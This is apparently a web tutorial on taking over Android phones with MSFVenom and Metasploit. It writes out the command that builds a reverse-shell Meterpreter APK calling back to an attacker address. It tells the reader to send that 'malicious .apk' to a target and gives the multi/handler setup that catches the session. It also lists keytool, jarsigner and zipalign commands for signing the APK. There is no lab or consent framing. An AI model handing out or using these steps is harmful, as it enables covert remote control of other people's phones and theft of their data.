In this tutorial you will learn how to Hack any Android mobile phone using MSFVenom.
Linux Based Operating System (In this tutorial we are using Kali Linux 2017.2)
MSFVenom is a hacking tool that targets the Android operating system. The tool is a combination of MSFEncode & MSFPayload.
Ok now lets get started open up a new terminal and enter the following command this command sets our payload and creates our custom executable.
# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=4444 R > hack.apk
If you don’t know what your LHOST is you can look it up using ifconfig.
You have now finished creating your malicious .apk file it will be saved to your /home/ folder. Locate your newly created .apk and send it to your target (hack.apk).
Now we need to start Metasploit framework and set up a multi handler. This is a special payload, as typically a Meterpreter payload is multistage, where a minimal amount of code is sent as part of the exploit, and then more is uploaded after code execution has been accomplished.
Open up a new terminal and use the following command to start Metasploit framework once the console has started set up your multi/handler.
msf > use multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.4
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit
When the Target clicks on the malicious app from the Android Main Activity Menu a session between Metasploit and the Android phone will be established. To list new sessions you can use command sessions -i to connect to a new session use command sessions -i 1 replacing 1 with the session id you want to connect with.
You may like to try out some of these useful Exploit commands :
Keytool (Comes Pre-Installed in Kali Linux)
keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
Jarsinger (Comes Pre-Installed in Kali Linux)
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore APPNAME.apk aliasname
jarsigner -verify -verbose -certs APPNAME.apk
Zipalign (Does not come pre-installed in Kali Linux)
apt-get install zipalign
zipalign -v 4 APPNAME.apk NEWAPPNAME.apk
Alternatively if you prefer to sign your .apk file direct from your Android device you can sign your .apk files with ZipSigner an Android app that signs update.zip files, APK, or JAR files using your own private keys or one of the four built-in certificates (media, platform, shared, testkey). All output are automatically zip-aligned. ZipSigner is an app combination of jarsigner, signapk, keytool, and zipalign.
We have now came to the end of this tutorial enjoy please consider sharing this tutorial with your friends and on social media.